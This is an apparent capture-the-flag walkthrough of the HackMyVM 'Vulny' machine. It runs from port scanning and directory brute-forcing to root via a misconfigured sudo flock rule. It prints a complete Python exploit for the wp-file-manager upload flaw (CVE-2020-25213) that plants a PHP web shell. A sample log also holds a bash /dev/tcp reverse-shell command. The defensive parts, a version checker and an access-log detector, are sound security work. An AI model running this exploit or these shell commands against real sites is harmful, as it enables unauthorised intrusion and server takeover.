# Walkthrough HackMyVm - Vulny

![vulny.PNG](https://hackmd.io/_uploads/HyPkeE9Xp.png)

Here I will make a writeup of the Vulny machine on the HackMyVm platform. It is rated easy; if you are interested, you can find it [**here**](https://hackmyvm.eu/machines/machine.php?vm=Vulny). Let's start.

### Reconnaissance

As always, the first thing I do is a port scan. Nmap finds only one open TCP port, HTTP (80):

```console
$ nmap -sC -sV -sT 192.168.1.38
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-09 03:13 EST
Nmap scan report for 192.168.1.38
Host is up (0.0014s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds
```

### Website

![1.PNG](https://hackmd.io/_uploads/H1ZDWm5ma.png)

The site only serves the default Apache page, so we need to look for hidden paths or files with a directory brute-forcing tool such as dirb or dirsearch.

### Directory Bruteforce

```console
$ dirsearch -u http://192.168.1.38/ --exclude-status 403,401

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Target: http://192.168.1.38/

[04:12:21] Starting:
[04:12:49] 200 -   11KB - /index.html
[04:12:51] 301 -  317B  - /javascript  ->  http://192.168.1.38/javascript/
[04:13:10] 301 -  313B  - /secret  ->  http://192.168.1.38/secret/

Task Completed
```

Here we find two directories: `/javascript` and `/secret`. Requesting `/javascript` returns 403 Forbidden, but `/secret` is accessible and contains a note.
![2.PNG](https://hackmd.io/_uploads/H17V47cQa.png)

The note tells us that a WordPress configuration file containing a username and password exists somewhere on the server. At first this seems odd, because neither Wappalyzer nor wpscan run against the site root report WordPress at all. The explanation is that WordPress is not installed at the web root but under `/secret/`, so anything pointed at `/` only sees the default Apache page.

![3.PNG](https://hackmd.io/_uploads/HypWPQcQp.png)

Next, we brute-force directories again with dirsearch, this time specifically under the `/secret` path.

```console
$ dirsearch -u http://192.168.1.38/secret/ --exclude-status 403,401

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Target: http://192.168.1.38/secret/

[04:32:45] Starting:
[04:33:29] 200 -    7KB - /secret/readme.html
[04:33:42] 301 -  322B  - /secret/wp-admin  ->  http://192.168.1.38/secret/wp-admin/
[04:33:42] 301 -  324B  - /secret/wp-content  ->  http://192.168.1.38/secret/wp-content/
[04:33:42] 500 -  610B  - /secret/wp-content/plugins/akismet/akismet.php
[04:33:42] 500 -  610B  - /secret/wp-content/plugins/akismet/admin.php
[04:33:42] 200 -    2KB - /secret/wp-content/
[04:33:42] 200 - 1003B  - /secret/wp-content/upgrade/
[04:33:42] 200 -    1KB - /secret/wp-content/uploads/
[04:33:42] 301 -  325B  - /secret/wp-includes  ->  http://192.168.1.38/secret/wp-includes/
[04:33:43] 500 -    3KB - /secret/wp-admin/setup-config.php
[04:33:43] 500 -    0B  - /secret/wp-includes/rss-functions.php

Task Completed
```

The `readme.html` hit is the stock WordPress readme, which confirms the note. Three directories are worth a look:

- `/wp-admin`: returns the same page as `/secret`

  ![4.PNG](https://hackmd.io/_uploads/SkRcdm5mp.png)

- `/wp-content`: responds 200 with a directory listing

  ![5.PNG](https://hackmd.io/_uploads/BJ42uXcma.png)

- `/wp-includes`: Forbidden

  ![6.PNG](https://hackmd.io/_uploads/H1NTd797a.png)

We focus on `/wp-content`, which contains an `/uploads` directory. Browsing it shows that this site uses the wp-file-manager plugin.
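Before reaching for an exploit, it is worth pinning the plugin version and checking it against the affected range rather than trusting a directory name. The following is an added example, not part of the original writeup or of any tool it uses: it parses the `Stable tag` line that every WordPress plugin's `readme.txt` carries and compares it, as a numeric tuple, against the range reported for CVE-2020-25213 (6.0 through 6.8, fixed in 6.9). The readme text is a constructed sample, and the path `/secret/wp-content/plugins/wp-file-manager/readme.txt` is an assumption based on the standard plugin layout, not something confirmed on this page.

```python
import re

# Constructed sample of a WordPress plugin readme.txt header (not fetched
# from the Vulny machine). "Stable tag" is the standard field a plugin uses
# to advertise its release, so it is the cheapest version fingerprint.
SAMPLE_README = """\
=== File Manager ===
Tags: file manager, wp file manager
Requires at least: 4.0
Tested up to: 5.5
Stable tag: 6.0
License: GPLv2 or later
"""

# Assumed location under this target's /secret WordPress install
# (standard plugin layout; not confirmed in the writeup).
README_PATH = "/secret/wp-content/plugins/wp-file-manager/readme.txt"

# CVE-2020-25213: 6.0 through 6.8 affected, 6.9 contains the fix.
FIRST_AFFECTED = (6, 0)
FIRST_FIXED = (6, 9)

STABLE_TAG = re.compile(r"^Stable tag:\s*([0-9]+(?:\.[0-9]+)*)\s*$", re.MULTILINE)


def parse_version(readme_text):
    """Return the Stable tag as a tuple of ints, or None if it is absent."""
    m = STABLE_TAG.search(readme_text)
    if not m:
        return None
    return tuple(int(part) for part in m.group(1).split("."))


def is_vulnerable(version):
    """Tuple comparison: 6.10 correctly sorts above 6.9, whereas a plain
    string comparison would wrongly flag it as affected."""
    return FIRST_AFFECTED <= version < FIRST_FIXED


def assess(readme_text):
    """Combine parsing and the range check into one verdict dict."""
    version = parse_version(readme_text)
    if version is None:
        return {"version": None, "vulnerable": None}
    return {
        "version": ".".join(str(p) for p in version),
        "vulnerable": is_vulnerable(version),
    }


if __name__ == "__main__":
    print(README_PATH, "->", assess(SAMPLE_README))
```

In practice you would fetch the readme with `curl` or `requests` and feed the body to `assess()`; the point of the tuple comparison is that plugin versions are not decimals, so `6.10` must not be treated as smaller than `6.9`.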
![7.PNG](https://hackmd.io/_uploads/SJ5Ltm9ma.png)

### Web Exploitation

Browsing http://192.168.1.38/secret/wp-content/uploads/2020/10/ reveals the wp-file-manager version: 6.0. That version is [**vulnerable**](https://www.exploit-db.com/exploits/51224) to CVE-2020-25213: the plugin ships elFinder's `connector.minimal.php` reachable without authentication, so anyone can upload a PHP file and get remote code execution. Versions 6.0 through 6.8 are affected; 6.9 fixed it.

![8.PNG](https://hackmd.io/_uploads/ryqAKm5XT.png)

We download the exploit and make one small change: `/secret` has to be inserted in front of `/wp-content` in both URLs, because WordPress is not installed at the web root here. The script below is the exploit-db code with that change, a corrected shebang, the Spanish messages translated, and comments added; its behaviour is otherwise unchanged.

```python
#!/usr/bin/env python3
# Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
# Date: [ 22-01-2023 ]
# Exploit Author: [BLY]
# Vendor Homepage: [https://wpscan.com/vulnerability/10389]
# Version: [ File Manager plugin 6.0-6.9]
# Tested on: [ Debian ]
# CVE : [ CVE-2020-25213 ]
#
# Modified for Vulny: WordPress lives under /secret, so that prefix is added
# to both plugin paths.

import signal
import sys

import requests
from bs4 import BeautifulSoup

# Multipart boundary used in the hand-built upload body below.
BOUNDARY = "----WebKitFormBoundaryvToPIGAB0m9SB1Ww"

# Minimal PHP web shell: runs whatever arrives in ?cmd= and wraps it in <pre>.
SHELL = "<?php echo \"<pre>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"; ?>"


def handler(sig, frame):
    print("[!] Exiting")
    sys.exit(1)


signal.signal(signal.SIGINT, handler)


def commandexec(url, command):
    # elFinder stores uploads under lib/files/; the original exploit reaches
    # the uploaded shell through lib/php/../files/.
    exec_url = url + "/secret/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php"
    r = requests.get(exec_url, params={"cmd": command})
    soup = BeautifulSoup(r.text, "html.parser")
    print(soup.get_text())


def exploit(url, command):
    # connector.minimal.php is the unauthenticated elFinder connector (CVE-2020-25213).
    upload_url = url + "/secret/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
    headers = {
        "content-type": "multipart/form-data; boundary=" + BOUNDARY,
        "Connection": "close",
    }
    # Fields: cmd=upload, target=l1_Lw (volume 1, base64url of "/" = the
    # volume root), upload[]=shell.php with the PHP payload as file content.
    payload = (
        "--" + BOUNDARY + "\r\n"
        'Content-Disposition: form-data; name="cmd"\r\n\r\nupload\r\n'
        "--" + BOUNDARY + "\r\n"
        'Content-Disposition: form-data; name="target"\r\n\r\nl1_Lw\r\n'
        "--" + BOUNDARY + "\r\n"
        'Content-Disposition: form-data; name="upload[]"; filename="shell.php"\r\n'
        "Content-Type: application/x-php\r\n\r\n"
        + SHELL + "\r\n"
        "--" + BOUNDARY + "--"
    )
    try:
        requests.post(upload_url, data=payload, headers=headers)
        commandexec(url, command)
    except requests.RequestException as e:
        print("[!] Something went wrong:", e)


def help():
    print("\n[*] Usage: python3", sys.argv[0], '"url" "command"')
    print("[!] Example: python3", sys.argv[0], "http://wordpress.local id")


if __name__ == "__main__":
    if len(sys.argv) != 3:
        help()
    else:
        exploit(sys.argv[1].rstrip("/"), sys.argv[2])
```

Then run the script.

![9.PNG](https://hackmd.io/_uploads/S1V7o79mT.png)

We now have command execution through the uploaded web shell; the next step is to upgrade it to a reverse shell.

![10.PNG](https://hackmd.io/_uploads/B11TjQ9QT.png)

With the reverse shell, we read the WordPress configuration file to find the username and password hinted at in the `/secret` note.

![11.PNG](https://hackmd.io/_uploads/ryW92Qqm6.png)

> idrinksomewater

A password was found. `/etc/passwd` shows a user `adrian`, so we try this password against `adrian` on the assumption that it was reused for the system account.

### Initial Access

Switch to `adrian` with the password obtained above (SSH is not exposed, so this is done from the reverse shell). The login succeeds.

![12.PNG](https://hackmd.io/_uploads/B1OBR7qQT.png)

Next we check whether the user has any sudo rights; `sudo -l` lists the commands the user may run.

![13.PNG](https://hackmd.io/_uploads/rJqR0XqQT.png)

`adrian` can run the `flock` binary with sudo, and [**GTFOBins**](https://gtfobins.github.io/gtfobins/flock/) shows how to turn that into privilege escalation: `flock` runs an arbitrary command while holding a lock on a file, so `sudo flock -u / /bin/sh` spawns a shell as root.

![14.PNG](https://hackmd.io/_uploads/SyO414cQa.png)

And root was successfully obtained. Vulny pwned!

![15.PNG](https://hackmd.io/_uploads/SkNjk49m6.png)
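On the defensive side, the chain above leaves a recognisable trail in the Apache access log: a POST to the elFinder connector, followed by GET requests to a `.php` file under the plugin's `lib/files/` upload directory carrying a `cmd` parameter. The following is an added example, not code from the writeup or from the exploit. The log lines are constructed to mirror the steps of this walkthrough (the `/secret` prefix, the `lib/php/../files/` spelling the exploit uses to reach its shell, a reverse-shell command), and the `lib/files/` upload location is taken from that exploit path. It percent-decodes and normalises `..` segments before matching, so both spellings of the shell path are caught.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format lines modelled on the steps of this
# walkthrough (not copied from the VM): the upload POST, the first command
# through the shell using the exploit's lib/php/../files/ spelling, a
# reverse-shell command using the direct lib/files/ path, plus benign noise.
SAMPLE_LOG = """\
192.168.1.10 - - [09/Nov/2023:04:12:49 -0500] "GET /index.html HTTP/1.1" 200 10918 "-" "Mozilla/5.0"
192.168.1.10 - - [09/Nov/2023:04:40:01 -0500] "POST /secret/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 312 "-" "python-requests/2.31.0"
192.168.1.10 - - [09/Nov/2023:04:40:02 -0500] "GET /secret/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php?cmd=id HTTP/1.1" 200 145 "-" "python-requests/2.31.0"
192.168.1.10 - - [09/Nov/2023:04:41:10 -0500] "GET /secret/wp-content/plugins/wp-file-manager/lib/files/shell.php?cmd=bash+-c+%27bash+-i+%3E%26+/dev/tcp/192.168.1.10/4444+0%3E%261%27 HTTP/1.1" 200 0 "-" "python-requests/2.31.0"
192.168.1.20 - - [09/Nov/2023:05:00:00 -0500] "GET /secret/wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 200 8012 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [ts] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# The elFinder connector the plugin left reachable without authentication.
CONNECTOR = "/wp-file-manager/lib/php/connector.minimal.php"
# Where the connector writes uploads; PHP should never be requested from here.
UPLOAD_DIR = "/wp-file-manager/lib/files/"


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def normalize_target(target):
    """Split off the query string, percent-decode the path and collapse '..'
    so lib/php/../files/shell.php and lib/files/shell.php compare equal."""
    parts = urlsplit(target)
    return posixpath.normpath(unquote(parts.path)), parts.query


def classify(entry):
    """Return a finding dict for a suspicious request, else None."""
    path, query = normalize_target(entry["target"])
    base = {"ip": entry["ip"], "ts": entry["ts"], "path": path, "status": entry["status"]}
    if entry["method"] == "POST" and path.endswith(CONNECTOR):
        return {**base, "indicator": "connector_post"}
    if UPLOAD_DIR in path and path.endswith(".php"):
        # parse_qs decodes '+' and %XX, so the operator's command is readable.
        cmd = parse_qs(query).get("cmd", [None])[0]
        return {**base, "indicator": "webshell_request", "cmd": cmd}
    return None


def scan(log_text):
    """Return one finding per suspicious request, in log order."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        hit = classify(entry)
        if hit is not None:
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["indicator"], f["path"], f.get("cmd", ""))
```

Run against a real `access.log` by passing its contents to `scan()`. A POST to the connector alone is already worth alerting on, since the plugin never needs that file called directly; the webshell rule catches the follow-up regardless of whether the attacker used the traversal spelling or the direct path.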